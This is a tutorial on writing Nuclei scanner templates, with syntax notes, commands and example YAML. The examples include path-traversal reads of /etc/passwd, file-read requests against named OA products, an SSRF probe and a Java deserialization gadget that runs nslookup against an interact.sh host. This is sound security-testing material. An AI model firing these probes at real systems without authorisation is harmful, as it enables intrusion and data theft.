Title: Nuclei template writing summary

1. Syntax format of scripts

Case sensitivity

Indent: Use indentation to represent hierarchical relationships, YAML uses spaces to indent, usually with two spaces per indentation level.

Key-value pairs: YAML stores data through key-value pairs, separated by a colon :

List: Use short horizontal lines - to represent items in the list.

Comments: Lines starting with # are comments.

String: Strings can be either without quotes or single or double quotes.

The id cannot have Chinese, special characters, -- and spaces, etc. The id parameter can be understood as the output title. It is a simple and easy-to-understand ID that allows you to judge faster.

info: information block, name, author, severity, description, reference and label, all belong to the scope of information block. Generally speaking, we only need to write the name, author, severity, description, and label.

name: template name, this suggestion is the same as id

severity: Severity, Chinese cannot be used here. Critical, high, Medium, and info are generally used to indicate the threat level.

Description: Vulnerability introduction, Chinese can be used here, and special characters are not limited. It is generally used for vulnerability introduction, which can facilitate users to understand the specific description of the vulnerability.

tags: tags are to add a tag to the vulnerability for easy scanning, for example: tags: seeyon (remember not to use Chinese)

I write nuclei's yaml scripts daily. Nuclei has built-in cookie-reuse attribute. When multiple requests are initiated, the session needs to be maintained. You can add cookie-reuse: true to keep the sessions maintained during multiple requests. This is useful when there is authentication.

If the match fails, you can use -debug to get the request package and return package for debugging. Use Burp to capture the package and directly paste the request package contents

2. Common Nuclei commands

1. Verify template format

nuclei -t test.yaml --validate

2. Specify templates and targets

nuclei -t test.yaml -u http://exam.com

3. Batch scan

nuclei -t test.yaml -l target.txt

4. Specify socks5 proxy scanning

nuclei -t test.yaml -u http://exam.com -p socks5://127.0.0.1:7890

3. Script example

id: file-include #The unique identifier of the template

info: #Contains basic information of the template, such as name, author, version, etc.

name: file include #The name of the script

author: bakclion #template author

severity: high #Security level Optional are info, low, medium, high, critical, unknown

description: nuclei template for testing shooting range #Description template content

reference: http://www.baidu.com #Reference Source

tags: test #Category tags

requests: #Defines the request section of how to interact with the target

- method: GET #HTTP methods such as GET or POST

path: #Requested path

- '{{BaseURL}}/vul/dir/dir_list.php?title=././././././././etc/passwd'

headers: #Request header

User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'

matchers:

- type: status #Match backpack status

status:

- 200

- type: regex #Match Return Content

part: body

regex:

- 'root:x:0:0:root:/root:/bin/bash'

IV. Script composition

1. Beginning

id: landray-oa-fileread

info:

name: landray-oa-fileread

author: backlion

severity: high

description: |

Lanling OA custom.jsp A random file reading vulnerability, this OA encounters relatively few

FOFA: app='Landray-OA system'

reference: https://github.com/backslion

tags: fileread,landray

2.Request

Get

requests:

- method: GET

path:

- '{{BaseURL}}/seeyon/webmail.do?method=doDownloadAttfilename=index.jspfilePath=./conf/datasourceCtp.properties'

POST

requests:

- method: POST

path:

- '{{BaseURL}}/sys/ui/extend/varkind/custom.jsp'

headers:

Content-Type: application/x-www-form-urlencoded

body: 'var={'body':{'file':'file:///etc/passwd'}}'

RAW

requests:

- raw:

- |

POST /spirit/interface/gateway.php HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

json={'url':'/general/././mysql5/my.ini'}

Jump

- method: GET

path:

- '{{BaseURL}}'

redirects: true

max-redirects: 2

or

requests:

- raw:

- |

GET /zentao/api-getModel-editor-save-filePath=bote HTTP/1.1

redirects: true

max-redirects: 3

Path

The next part of the request is the path to the request. Dynamic variables can be placed in a path to modify their behavior at runtime. Variables begin with {{ and }} and end with case-sensitive.

{{Hostname}}: This is a commonly used reserved word that indicates the host name.

{{randstr}}: This is a random string.

{{rand_int(1,9999)}}: This is a reserved word that generates random integers between 1 and 9999.

{{BaseURL}}: Represents the complete base URL, for example https://example.com:443/foo/bar.php.

{{RootURL}}: Represents a base URL that does not contain paths and files, such as https://example.com:443.

{{Host}}: Represents the host name, such as example.com.

{{Port}}: Indicates the port number, for example, 443.

{{Path}}: represents a path, such as /seeyon/login.

{{File}}: Represents the file name, such as bar.php.

{{Scheme}}: Represents a protocol, such as https.

{{hex_decode('')}}: This is a reserved word decoded in hexadecimal.

md5(): This is a reserved word converted by MD5

Variable Value

{{BaseURL}} https://example.com:443/foo/bar.php

{{RootURL}} https://example.com:443

{{Hostname}} example.com:443

{{Host}} example.com

{{Port}} 443

{{Path}} /foo

{{File}} bar.php

{{Scheme}} https

stop-at-first-match

The general idea is that there are multiple scan paths in a template. When the first hits, the scanning of the next several paths will automatically stop. Of course, this will not affect other templates.

requests:

- method: GET

path:

- '{{BaseURL}}'

- '{{BaseURL}}/login'

- '{{BaseURL}}/main'

- '{{BaseURL}}/index'

stop-at-first-match: true

OOB

Since the release of Nuclei v2.3.6, Nuclei supports the use of the built-in automatic request association of the interact.sh API to implement OOB-based vulnerability scanning. Just as simple as writing {{interactsh-url}} anywhere in the request and adding a matcher for interact_protocol. Nuclei will handle the correlation of interactions with templates, as well as the correlation of requests generated by allowing easy OOB scans.

requests:

- raw:

- |

GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1

Host: {{Hostname}}

JAVA Deserialization

raw:

- |

POST /index.faces;jsessionid=x HTTP/1.1

Host: {{Hostname}}

Accept-Encoding: gzip, deflate

Content-Length: 1882

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Connection: close

Content-Type: application/x-www-form-urlencoded

javax.faces.ViewState={{generate_java_gadget('commons_collection3.1', 'nslookup {{interact.sh}}', 'base64')}}

3.Matcher

matchers-condition: and #Realistic operation of the matching results of multiple matchers: and|or, AND meets the conditions at the same time

matchers:

- type: dsl #matcher type status|word|size|binary|regex|dsl

dsl: #Use DSL syntax for data matching (!Note: more flexible, complex matching, recommended) StringSlice

- 'status_code_1==200 status_code_2==302'

- 'all_headers_1=='admin' all_headers_2=='index''

condition: and #need to meet the above two conditions at the same time

- type: word

words: #Return package matching text (! Note: word type is more special here, and you need to use words for matching entry) StringSlice

- 'admin.php'

- '61646d696e2e706870'

- '{{match_str}}'

encoding: hex # encoder, encodes the returned extracted data and matches the word content (! Note: Only word matcher is supported, only hex is supported) hex

#The following settings are basically common (! Note: except for the dsl type)

part: header #Read the area where the data is returned header|body|no settings represent full match|interactsh_protocol|interactsh_request(!Note: The dnslog server returns data, and needs to be used in the packet with {{interactsh-url}}

condition: or #Match result logical operation and|or

negative: true #Inverse the matching result, combined with condition, a more flexible combination method can be achieved. true|false

- type: status

status: #The same as the matcher type, currently returns the packet status code intSlice, 200 or 302

- 200

- type: regex

regex: #Use regularity for data matching StringSlice

- '.*\admin.php.*'

- type: binary

binary: #Use binary for data matching StringSlice

- '61646d696e2e706870'

- type: size

size: #Return the packet data size (Note: refers to body data) intSlice

- 1234

dsl is generally used for complex logical judgments, including the following built-in functions.

Variable name description example output data content_length

Content length header

content_length

12345

status_code

Response status code

status_code

200

all_headers

Return to header information

Body

Return body information

body_1

header_name

Returns the key value information of the header, all lowercase, and - replaced by _

user_agent

xxxx

header_name

Returns the key value information of the header, all lowercase, and - replaced by _

set_cookie

xxx=